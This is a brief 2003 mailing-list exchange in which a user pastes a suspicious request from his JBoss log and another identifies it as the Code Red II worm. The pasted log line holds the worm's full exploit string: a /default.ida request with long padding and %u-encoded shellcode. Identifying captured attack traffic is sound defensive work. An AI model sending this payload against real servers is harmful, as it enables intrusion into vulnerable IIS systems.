I got the "you do not exists, go away" message. I then started to look around the only suspicious item i found
was this in the jboss request logfile.
I see many of these come through looking for a windows
based webserver but this one looks like it could have
been intended for jboss on linux.
-Tom-
202.42.48.41 - - [09/Mar/2003:00:05:55 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN\
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN\
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801\
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1137 "-\
" "-"
I believe this is the Code Red II virus. The following describes it in some detail.
http://www.thesitewizard.com/news/coderediiworm.shtml
Darryl